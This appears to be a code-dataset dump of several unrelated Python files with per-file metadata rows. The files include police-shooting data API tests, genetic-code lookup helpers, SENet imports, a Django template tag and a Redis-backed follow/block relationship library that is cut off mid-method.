assert check_ois.resident_sex == cleaner.sex(sent_ois['residentSex'])
assert check_ois.resident_age == cleaner.number_to_string(sent_ois['residentAge'])
assert check_ois.resident_weapon_used == cleaner.resident_weapon_used(sent_ois['residentWeaponUsed'])
assert check_ois.resident_condition == sent_ois['residentCondition']
assert check_ois.officer_identifier == sent_ois['officerIdentifier']
assert check_ois.officer_weapon_used == sent_ois['officerForceType']
assert check_ois.officer_race == cleaner.race(sent_ois['officerRace'])
assert check_ois.officer_sex == cleaner.sex(sent_ois['officerSex'])
assert check_ois.officer_age == cleaner.number_to_string(sent_ois['officerAge'])
assert check_ois.officer_years_of_service == cleaner.string_to_integer(sent_ois['officerYearsOfService'])
assert check_ois.officer_condition == sent_ois['officerCondition']
def test_update_ois_data(self, testapp):
''' Updated OIS data from the extractor is processed as expected.
'''
# Set up the extractor
department = Department.create(name="IM Police Department", short_name="IMPD", load_defaults=False)
extractor, envs = Extractor.from_department_and_password(department=department, password="password")
# Set the correct authorization
testapp.authorization = ('Basic', (extractor.username, 'password'))
# Get a generated list of OIS descriptions from the JSON test client
test_client = JSONTestClient()
ois_data = test_client.get_prebaked_ois(last=1)
# post the json to the OIS URL
response = testapp.post_json("/data/OIS", params={'month': 0, 'year': 0, 'data': ois_data})
# assert that we got the expected reponse
assert response.status_code == 200
assert response.json_body['updated'] == 0
assert response.json_body['added'] == 1
# Get the second pre-baked ois incident
updated_ois_data = test_client.get_prebaked_ois(first=1, last=2)
# Swap in the opaque ID from the first ois incident
updated_ois_data[0]["opaqueId"] = ois_data[0]["opaqueId"]
# The ois incident won't be a match unless this field is the same
updated_ois_data[0]["officerIdentifier"] = ois_data[0]["officerIdentifier"]
# post the json to the ois URL
response = testapp.post_json("/data/OIS", params={'month': 0, 'year': 0, 'data': updated_ois_data})
# assert that we got the expected reponse
assert response.status_code == 200
assert response.json_body['updated'] == 1
assert response.json_body['added'] == 0
# There's only one complaint in the database.
all_ois = OfficerInvolvedShootingIMPD.query.all()
assert len(all_ois) == 1
# check the ois incident in the database against the updated data that was sent
cleaner = Cleaners()
sent_ois = updated_ois_data[0]
check_ois = OfficerInvolvedShootingIMPD.query.filter_by(opaque_id=sent_ois['opaqueId']).first()
assert check_ois.occured_date.strftime('%Y-%m-%d %-H:%-M:%S') == sent_ois['occuredDate']
assert check_ois.division == cleaner.capitalize(sent_ois['division'])
assert check_ois.precinct == cleaner.capitalize(sent_ois['precinct'])
assert check_ois.shift == cleaner.capitalize(sent_ois['shift'])
assert check_ois.beat == cleaner.capitalize(sent_ois['beat'])
assert check_ois.disposition == sent_ois['disposition']
assert check_ois.resident_race == cleaner.race(sent_ois['residentRace'])
assert check_ois.resident_sex == cleaner.sex(sent_ois['residentSex'])
assert check_ois.resident_age == cleaner.number_to_string(sent_ois['residentAge'])
assert check_ois.resident_weapon_used == cleaner.resident_weapon_used(sent_ois['residentWeaponUsed'])
assert check_ois.resident_condition == sent_ois['residentCondition']
assert check_ois.officer_identifier == sent_ois['officerIdentifier']
assert check_ois.officer_weapon_used == sent_ois['officerForceType']
assert check_ois.officer_race == cleaner.race(sent_ois['officerRace'])
assert check_ois.officer_sex == cleaner.sex(sent_ois['officerSex'])
assert check_ois.officer_age == cleaner.number_to_string(sent_ois['officerAge'])
assert check_ois.officer_years_of_service == cleaner.string_to_integer(sent_ois['officerYearsOfService'])
assert check_ois.officer_condition == sent_ois['officerCondition']
def test_post_ois_data_near_match_does_not_update(self, testapp):
''' OIS data with the same ID but different details creates a new record.
'''
# Set up the extractor
department = Department.create(name="IM Police Department", short_name="IMPD", load_defaults=False)
extractor, envs = Extractor.from_department_and_password(department=department, password="password")
# Set the correct authorization
testapp.authorization = ('Basic', (extractor.username, 'password'))
# Get a generated list of OIS descriptions from the JSON test client
test_client = JSONTestClient()
ois_data = test_client.get_prebaked_ois(last=1)
# post the json to the OIS URL
response = testapp.post_json("/data/OIS", params={'month': 0, 'year': 0, 'data': ois_data})
# assert that we got the expected reponse
assert response.status_code == 200
assert response.json_body['updated'] == 0
assert response.json_body['added'] == 1
# Get the second pre-baked ois incident
updated_ois_data = test_client.get_prebaked_ois(first=1, last=2)
# Swap in the opaque ID from the first ois incident
updated_ois_data[0]["opaqueId"] = ois_data[0]["opaqueId"]
# post the json to the ois URL
response = testapp.post_json("/data/OIS", params={'month': 0, 'year': 0, 'data': updated_ois_data})
# assert that we got the expected reponse
assert response.status_code == 200
assert response.json_body['updated'] == 0
assert response.json_body['added'] == 1
# There's only one complaint in the database.
all_ois = OfficerInvolvedShootingIMPD.query.all()
assert len(all_ois) == 2
| 56.749395 | 127 | 0.699925 | 5,691 | 46,875 | 5.545423 | 0.053242 | 0.067619 | 0.034602 | 0.034855 | 0.904021 | 0.896575 | 0.886467 | 0.882157 | 0.865585 | 0.858677 | 0 | 0.007655 | 0.197419 | 46,875 | 825 | 128 | 56.818182 | 0.831211 | 0.167019 | 0 | 0.810811 | 0 | 0 | 0.137493 | 0.007583 | 0 | 0 | 0 | 0 | 0.540541 | 1 | 0.03861 | false | 0.073359 | 0.017375 | 0 | 0.057915 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 9 |
0fad4c466bf2bfdd0cbe20c856a8f434d8c265b0 | 176 | py | Python | challenge_1/python/ning/challenge_1.py | rchicoli/2017-challenges | 44f0b672e5dea34de1dde131b6df837d462f8e29 | [
"Apache-2.0"
] | 271 | 2017-01-01T22:58:36.000Z | 2021-11-28T23:05:29.000Z | challenge_1/python/ning/challenge_1.py | AakashOfficial/2017Challenges | a8f556f1d5b43c099a0394384c8bc2d826f9d287 | [
"Apache-2.0"
] | 283 | 2017-01-01T23:26:05.000Z | 2018-03-23T00:48:55.000Z | challenge_1/python/ning/challenge_1.py | AakashOfficial/2017Challenges | a8f556f1d5b43c099a0394384c8bc2d826f9d287 | [
"Apache-2.0"
] | 311 | 2017-01-01T22:59:23.000Z | 2021-09-23T00:29:12.000Z | def reverse_string(original_string):
return original_string[::-1]
original_string = str(input("Enter a string to be reversed > "))
print(reverse_string(original_string))
| 25.142857 | 64 | 0.767045 | 24 | 176 | 5.375 | 0.583333 | 0.434109 | 0.325581 | 0.418605 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006452 | 0.119318 | 176 | 6 | 65 | 29.333333 | 0.825806 | 0 | 0 | 0 | 0 | 0 | 0.182857 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0 | 0.25 | 0.5 | 0.25 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 7 |
0fb2223e04136b6d5add50420ab01f13e78cab6f | 5,354 | py | Python | helpers/gc_file_helpers.py | ibbad/dna-lceb-web | b4c1d4e121dfea992e072979bfdc0f313c781e32 | [
"Apache-2.0"
] | null | null | null | helpers/gc_file_helpers.py | ibbad/dna-lceb-web | b4c1d4e121dfea992e072979bfdc0f313c781e32 | [
"Apache-2.0"
] | null | null | null | helpers/gc_file_helpers.py | ibbad/dna-lceb-web | b4c1d4e121dfea992e072979bfdc0f313c781e32 | [
"Apache-2.0"
] | null | null | null | """
This module contains the helpers functions for reading genetic code table
information from json file.
"""
import json
# Read the list of genetic codes and associated files in a dictionary.
with open("gc_files/gc_file_associations.json") as gc_directory:
gc_file_associations = json.load(gc_directory)
def codon_to_aa(codon, gc=1):
"""
This functions returns 3 letter notation e.g. 'ala' for amino acid
respective to given codon.
:param codon: Codon (string) e.g. AAA
:param gc: genetic code (Integer) default=1 i.e. standard_genetic_code
:return:
"""
try:
if str(gc) not in gc_file_associations.keys():
# No entry for the required genetic code
return None
# Read the file
with open(gc_file_associations.get(str(gc))) as gc_file:
gc_data = json.load(gc_file)
for key in gc_data.keys():
aa_data = gc_data.get(key)
if codon.upper() in aa_data["codons"]:
# found the codon, return AA key.
return key
# Could not find this codon in any AA's data.
return None
except Exception:
return None
def aa_to_codon(aa, gc=1):
"""
This function returns the list of codons for given amino acid according
to respective genetic code table.
:param aa: amino acid notation/ name (String) e.g. Full name e.g. Alanine or
3-letter notation e.g. Ala or single letter notation e.g. A
:param gc: genetic code (Integer) default=1 i.e. standard_genetic_code
:return:
"""
try:
if str(gc) not in gc_file_associations.keys():
# No entry for the required genetic code
return None
# Read the file for genetic code table information
with open(gc_file_associations.get(str(gc))) as gc_file:
gc_data = json.load(gc_file)
# if notation is given
if len(aa) == 3:
if aa.lower() in gc_data.keys():
return gc_data.get(aa.lower())["codons"]
# lookup for fullname or notation
for key in gc_data.keys():
aa_data = gc_data.get(key)
if aa_data["name"].lower() == aa.lower() or \
aa_data["symbol"].lower() == aa.lower():
return aa_data["codons"]
# If nothing is found, return None
return None
except Exception:
return None
def get_aa_using_name(aa, gc=1):
"""
This function returns a dictionary object containing
:param aa: amino acid notation/ name (String) e.g. Full name e.g. Alanine or
3-letter notation e.g. Ala or single letter notation e.g. A
:param gc: genetic code (Integer) default=1 i.e. standard_genetic_code
:return:
"""
try:
if str(gc) not in gc_file_associations.keys():
# No entry for the required genetic code
return None
# Read the file for genetic code table information
with open(gc_file_associations.get(str(gc))) as gc_file:
gc_data = json.load(gc_file)
# if notation is given
if len(aa) == 3:
if aa.lower() in gc_data.keys():
return gc_data.get(aa.lower())
# lookup for fullname or notation
for key in gc_data.keys():
aa_data = gc_data.get(key)
if aa_data["name"].lower() == aa.lower() or \
aa_data["symbol"].lower() == aa.lower():
return aa_data
# If nothing is found, return None
return None
except Exception:
return None
def get_aa_using_codon(codon, gc=1):
"""
This functions returns dictionary object containing data for respective
amino acid for the given codon.
:param codon: Codon (string) e.g. AAA
:param gc: genetic code (Integer) default=1 i.e. standard_genetic_code
:return:
"""
try:
if str(gc) not in gc_file_associations.keys():
# No entry for the required genetic code
return None
# Read the file
with open(gc_file_associations.get(str(gc))) as gc_file:
gc_data = json.load(gc_file)
for key in gc_data.keys():
aa_data = gc_data.get(key)
if codon.upper() in aa_data["codons"]:
# found the codon, return AA key.
return aa_data
# Could not find this codon in any AA's data.
return None
except Exception:
return None
def get_synonymous_codons(codon, gc=1):
"""
This functions returns list object containing synonymous codons for given
codon.
:param codon: Codon (string) e.g. AAA
:param gc: genetic code (Integer) default=1 i.e. standard_genetic_code
:return:
"""
try:
if str(gc) not in gc_file_associations.keys():
# No entry for the required genetic code
return None
# Read the file
with open(gc_file_associations.get(str(gc))) as gc_file:
gc_data = json.load(gc_file)
for key in gc_data.keys():
aa_data = gc_data.get(key)
if codon.upper() in aa_data["codons"]:
# found the codon, return AA key.
return aa_data["codons"]
# Could not find this codon in any AA's data.
return None
except Exception:
return None
| 33.254658 | 80 | 0.603661 | 765 | 5,354 | 4.101961 | 0.12549 | 0.042065 | 0.068834 | 0.026769 | 0.833333 | 0.833333 | 0.784895 | 0.784895 | 0.783939 | 0.783939 | 0 | 0.004047 | 0.307807 | 5,354 | 160 | 81 | 33.4625 | 0.842688 | 0.398207 | 0 | 0.855263 | 0 | 0 | 0.029674 | 0.01121 | 0 | 0 | 0 | 0 | 0 | 1 | 0.065789 | false | 0 | 0.013158 | 0 | 0.368421 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
0fb6c4ff6e10136ea7e79c67b0b3b51ab26db1b6 | 488 | py | Python | chainercv/links/model/senet/__init__.py | souravsingh/chainercv | 8f76510472bc95018c183e72f37bc6c34a89969c | [
"MIT"
] | 1,600 | 2017-06-01T15:37:52.000Z | 2022-03-09T08:39:09.000Z | chainercv/links/model/senet/__init__.py | souravsingh/chainercv | 8f76510472bc95018c183e72f37bc6c34a89969c | [
"MIT"
] | 547 | 2017-06-01T06:43:16.000Z | 2021-05-28T17:14:05.000Z | chainercv/links/model/senet/__init__.py | souravsingh/chainercv | 8f76510472bc95018c183e72f37bc6c34a89969c | [
"MIT"
] | 376 | 2017-06-02T01:29:10.000Z | 2022-03-13T11:19:59.000Z | from chainercv.links.model.senet.se_resnet import SEResNet # NOQA
from chainercv.links.model.senet.se_resnet import SEResNet101 # NOQA
from chainercv.links.model.senet.se_resnet import SEResNet152 # NOQA
from chainercv.links.model.senet.se_resnet import SEResNet50 # NOQA
from chainercv.links.model.senet.se_resnext import SEResNeXt # NOQA
from chainercv.links.model.senet.se_resnext import SEResNeXt101 # NOQA
from chainercv.links.model.senet.se_resnext import SEResNeXt50 # NOQA
| 61 | 71 | 0.827869 | 70 | 488 | 5.671429 | 0.242857 | 0.229219 | 0.31738 | 0.405542 | 0.808564 | 0.808564 | 0.808564 | 0.808564 | 0.702771 | 0 | 0 | 0.029613 | 0.10041 | 488 | 7 | 72 | 69.714286 | 0.874715 | 0.069672 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 11 |
0ff3deb53709c55d527715512a2566807cfc64eb | 194 | py | Python | studio/templatetags/custom_tags.py | KishorBalgi/live-stream-studio-booking | 7b652cf24980f3c78920b83853a7cceabf6824d2 | [
"Apache-2.0"
] | 4 | 2022-02-06T05:21:50.000Z | 2022-02-28T14:35:31.000Z | studio/templatetags/custom_tags.py | KishorBalgi/live-stream-studio-booking | 7b652cf24980f3c78920b83853a7cceabf6824d2 | [
"Apache-2.0"
] | null | null | null | studio/templatetags/custom_tags.py | KishorBalgi/live-stream-studio-booking | 7b652cf24980f3c78920b83853a7cceabf6824d2 | [
"Apache-2.0"
] | 2 | 2022-02-04T17:10:07.000Z | 2022-02-17T06:16:10.000Z | from django import template
from django.urls import reverse
register = template.Library()
@register.simple_tag
def anchor(url_name, section_id):
return reverse(url_name) + '#' + section_id | 24.25 | 47 | 0.773196 | 27 | 194 | 5.37037 | 0.62963 | 0.137931 | 0.193103 | 0.22069 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.134021 | 194 | 8 | 47 | 24.25 | 0.863095 | 0 | 0 | 0 | 0 | 0 | 0.005128 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.333333 | 0.166667 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
ba0298b5b34b780363221f343d1aee71356756fc | 40 | py | Python | test.py | coush001/Seismic-Dimensionality-Reduction | 59e5b50a9fc0b023168375e9fd4a4b22bae1fa43 | [
"MIT"
] | null | null | null | test.py | coush001/Seismic-Dimensionality-Reduction | 59e5b50a9fc0b023168375e9fd4a4b22bae1fa43 | [
"MIT"
] | null | null | null | test.py | coush001/Seismic-Dimensionality-Reduction | 59e5b50a9fc0b023168375e9fd4a4b22bae1fa43 | [
"MIT"
] | null | null | null | def run():
print('IMPORTED SUCCES')
| 13.333333 | 28 | 0.625 | 5 | 40 | 5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.2 | 40 | 2 | 29 | 20 | 0.78125 | 0 | 0 | 0 | 0 | 0 | 0.375 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0.5 | 0 | 1 | 0.5 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 7 |
e85d6691c5c32e6835916976d8e9927201ff481b | 38,289 | py | Python | amico/amico.py | agoragames/amico-python | 1d2d9593bc3ac41247bb64c32efea1d2050807d1 | [
"MIT"
] | 1 | 2015-09-03T23:47:54.000Z | 2015-09-03T23:47:54.000Z | amico/amico.py | agoragames/amico-python | 1d2d9593bc3ac41247bb64c32efea1d2050807d1 | [
"MIT"
] | null | null | null | amico/amico.py | agoragames/amico-python | 1d2d9593bc3ac41247bb64c32efea1d2050807d1 | [
"MIT"
] | 2 | 2018-11-22T09:34:07.000Z | 2020-04-30T11:41:06.000Z | import math
import time
import redis
class Amico(object):
VERSION = '1.0.1'
DEFAULTS = {
'namespace': 'amico',
'following_key': 'following',
'followers_key': 'followers',
'blocked_key': 'blocked',
'blocked_by_key': 'blocked_by',
'reciprocated_key': 'reciprocated',
'pending_key': 'pending',
'pending_with_key': 'pending_with',
'pending_follow': False,
'default_scope_key': 'default',
'page_size': 25
}
def __init__(self, options=DEFAULTS, redis_connection=None):
'''
Initialize a new class for establishing relationships.
@param options [dictionary] (Default: Amico.DEFAULTS)
@param redis_connection [redis] (Default: None) Redis connection
'''
self.options = Amico.DEFAULTS.copy()
self.options.update(options)
if redis_connection is None:
self.redis_connection = redis.StrictRedis(
host='localhost',
port=6379,
db=0)
else:
self.redis_connection = redis_connection
def follow(self, from_id, to_id, scope=None):
'''
Establish a follow relationship between two IDs. After adding the follow
relationship, it checks to see if the relationship is reciprocated and establishes that
relationship if so.
@param from_id [String] The ID of the individual establishing the follow relationship.
@param to_id [String] The ID of the individual to be followed.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
if from_id == to_id:
return
if self.is_blocked(to_id, from_id, scope):
return
if self.options['pending_follow'] and self.is_pending(from_id, to_id, scope):
return
if self.options['pending_follow']:
transaction = self.redis_connection.pipeline()
transaction.zadd(
'%s:%s:%s:%s' %
(self.options['namespace'], self.options['pending_key'], scope, to_id), int(
time.time()), from_id)
transaction.zadd(
'%s:%s:%s:%s' %
(self.options['namespace'], self.options['pending_with_key'], scope, from_id), int(
time.time()), to_id)
transaction.execute()
else:
self.__add_following_followers_reciprocated(from_id, to_id, scope)
def unfollow(self, from_id, to_id, scope=None):
'''
Remove a follow relationship between two IDs. After removing the follow
relationship, if a reciprocated relationship was established, it is
also removed.
@param from_id [String] The ID of the individual removing the follow relationship.
@param to_id [String] The ID of the individual to be unfollowed.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
if from_id == to_id:
return
transaction = self.redis_connection.pipeline()
transaction.zrem(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['following_key'],
scope,
from_id),
to_id)
transaction.zrem(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['followers_key'],
scope,
to_id),
from_id)
transaction.zrem(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['reciprocated_key'],
scope,
from_id),
to_id)
transaction.zrem(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['reciprocated_key'],
scope,
to_id),
from_id)
transaction.zrem(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['pending_key'],
scope,
to_id),
from_id)
transaction.zrem(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['pending_with_key'],
scope,
from_id),
to_id)
transaction.execute()
def block(self, from_id, to_id, scope=None):
'''
Block a relationship between two IDs. This method also has the side effect
of removing any follower or following relationship between the two IDs.
@param from_id [String] The ID of the individual blocking the relationship.
@param to_id [String] The ID of the individual being blocked.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
if from_id == to_id:
return
transaction = self.redis_connection.pipeline()
transaction.zrem(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['following_key'],
scope,
from_id),
to_id)
transaction.zrem(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['following_key'],
scope,
to_id),
from_id)
transaction.zrem(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['followers_key'],
scope,
to_id),
from_id)
transaction.zrem(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['followers_key'],
scope,
from_id),
to_id)
transaction.zrem(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['reciprocated_key'],
scope,
from_id),
to_id)
transaction.zrem(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['reciprocated_key'],
scope,
to_id),
from_id)
transaction.zrem(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['pending_key'],
scope,
from_id),
to_id)
transaction.zrem(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['pending_with_key'],
scope,
to_id),
from_id)
transaction.zadd(
'%s:%s:%s:%s' %
(self.options['namespace'], self.options['blocked_key'], scope, from_id), int(
time.time()), to_id)
transaction.zadd(
'%s:%s:%s:%s' %
(self.options['namespace'], self.options['blocked_by_key'], scope, to_id), int(
time.time()), from_id)
transaction.execute()
def unblock(self, from_id, to_id, scope=None):
'''
Unblock a relationship between two IDs.
@param from_id [String] The ID of the individual unblocking the relationship.
@param to_id [String] The ID of the blocked individual.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
if from_id == to_id:
return
transaction = self.redis_connection.pipeline()
transaction.zrem(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['blocked_key'],
scope,
from_id),
to_id)
transaction.zrem(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['blocked_by_key'],
scope,
to_id),
from_id)
transaction.execute()
def accept(self, from_id, to_id, scope=None):
'''
Accept a relationship that is pending between two IDs.
@param from_id [String] The ID of the individual accepting the relationship.
@param to_id [String] The ID of the individual to be accepted.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
if from_id == to_id:
return
self.__add_following_followers_reciprocated(from_id, to_id, scope)
def deny(self, from_id, to_id, scope=None):
'''
Deny a relationship that is pending between two IDs.
@param from_id [String] The ID of the individual denying the relationship.
@param to_id [String] The ID of the individual to be denied.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
if from_id == to_id:
return
transaction = self.redis_connection.pipeline()
transaction.zrem(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['pending_key'],
scope,
to_id),
from_id)
transaction.zrem(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['pending_with_key'],
scope,
from_id),
to_id)
transaction.execute()
def clear(self, id, scope=None):
'''
Clears all relationships (in either direction) stored for an individual.
Helpful to prevent orphaned associations when deleting users.
@param id [String] ID of the individual to clear info for.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
# no longer following (or followed by) anyone
self.__clear_bidirectional_sets_for_id(
id,
self.options['following_key'],
self.options['followers_key'],
scope)
self.__clear_bidirectional_sets_for_id(
id,
self.options['followers_key'],
self.options['following_key'],
scope)
self.__clear_bidirectional_sets_for_id(
id,
self.options['reciprocated_key'],
self.options['reciprocated_key'],
scope)
# no longer blocked by (or blocking) anyone
self.__clear_bidirectional_sets_for_id(
id,
self.options['blocked_by_key'],
self.options['blocked_key'],
scope)
self.__clear_bidirectional_sets_for_id(
id,
self.options['blocked_key'],
self.options['blocked_by_key'],
scope)
# no longer pending with anyone (or have any pending followers)
self.__clear_bidirectional_sets_for_id(
id,
self.options['pending_with_key'],
self.options['pending_key'],
scope)
self.__clear_bidirectional_sets_for_id(
id,
self.options['pending_key'],
self.options['pending_with_key'],
scope)
def is_blocked(self, id, blocked_id, scope=None):
'''
Check to see if one individual has blocked another individual.
@param id [String] ID of the individual checking the blocked status.
@param blocked_id [String] ID of the individual to see if they are blocked by id.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
return self.redis_connection.zscore(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['blocked_key'],
scope,
id),
blocked_id) is not None
def is_blocked_by(self, id, blocked_by_id, scope=None):
'''
Check to see if one individual is blocked by another individual.
@param id [String] ID of the individual checking the blocked by status.
@param blocked_id [String] ID of the individual to see if they have blocked id.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
return self.redis_connection.zscore(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['blocked_by_key'],
scope,
id),
blocked_by_id) is not None
def is_follower(self, id, follower_id, scope=None):
'''
Check to see if one individual is a follower of another individual.
@param id [String] ID of the individual checking the follower status.
@param following_id [String] ID of the individual to see if they are following id.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
return self.redis_connection.zscore(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['followers_key'],
scope,
id),
follower_id) is not None
def is_following(self, id, following_id, scope=None):
'''
Check to see if one individual is following another individual.
@param id [String] ID of the individual checking the following status.
@param following_id [String] ID of the individual to see if they are being followed by id.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
return self.redis_connection.zscore(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['following_key'],
scope,
id),
following_id) is not None
def is_reciprocated(self, from_id, to_id, scope=None):
'''
Check to see if one individual has reciprocated in following another individual.
@param from_id [String] ID of the individual checking the reciprocated relationship.
@param to_id [String] ID of the individual to see if they are following from_id.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
return self.is_following(
from_id,
to_id,
scope) and self.is_following(
to_id,
from_id,
scope)
def is_pending(self, from_id, to_id, scope=None):
'''
Check to see if one individual has a pending relationship in following another individual.
@param from_id [String] ID of the individual checking the pending relationships.
@param to_id [String] ID of the individual to see if they are pending a follow from from_id.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
return self.redis_connection.zscore(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['pending_key'],
scope,
to_id),
from_id) is not None
def is_pending_with(self, from_id, to_id, scope=None):
'''
Check to see if one individual has a pending relationship with another.
@param from_id [String] ID of the individual checking the pending relationships.
@param to_id [String] ID of the individual to see if they are pending an approval from from_id.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
return self.redis_connection.zscore(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['pending_with_key'],
scope,
to_id),
from_id) is not None
def following_count(self, id, scope=None):
'''
Count the number of individuals that someone is following.
@param id [String] ID of the individual to retrieve following count for.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
return self.redis_connection.zcard(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['following_key'],
scope,
id))
def followers_count(self, id, scope=None):
'''
Count the number of individuals that are following someone.
@param id [String] ID of the individual to retrieve followers count for.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
return self.redis_connection.zcard(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['followers_key'],
scope,
id))
def blocked_count(self, id, scope=None):
'''
Count the number of individuals that someone has blocked.
@param id [String] ID of the individual to retrieve blocked count for.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
return self.redis_connection.zcard(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['blocked_key'],
scope,
id))
def blocked_by_count(self, id, scope=None):
'''
Count the number of individuals blocking another.
@param id [String] ID of the individual to retrieve blocked_by count for.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
return self.redis_connection.zcard(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['blocked_by_key'],
scope,
id))
def reciprocated_count(self, id, scope=None):
'''
Count the number of individuals that have reciprocated a following relationship.
@param id [String] ID of the individual to retrieve reciprocated following count for.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
return self.redis_connection.zcard(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['reciprocated_key'],
scope,
id))
def pending_count(self, id, scope=None):
'''
Count the number of relationships pending for an individual.
@param id [String] ID of the individual to retrieve pending count for.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
return self.redis_connection.zcard(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['pending_key'],
scope,
id))
def pending_with_count(self, id, scope=None):
'''
Count the number of relationships an individual has pending with another.
@param id [String] ID of the individual to retrieve pending count for.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
return self.redis_connection.zcard(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['pending_with_key'],
scope,
id))
def following(self, id, page_options=None, scope=None):
'''
Retrieve a page of followed individuals for a given ID.
@param id [String] ID of the individual.
@param page_options [Hash] Options to be passed for retrieving a page of followed individuals.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
if page_options is None:
page_options = self.__default_paging_options()
return self.__members(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['following_key'],
scope,
id),
page_options)
def followers(self, id, page_options=None, scope=None):
'''
Retrieve a page of followers for a given ID.
@param id [String] ID of the individual.
@param page_options [Hash] Options to be passed for retrieving a page of followers.
@param scope [String] Scope for the call.
'''
if scope is None:
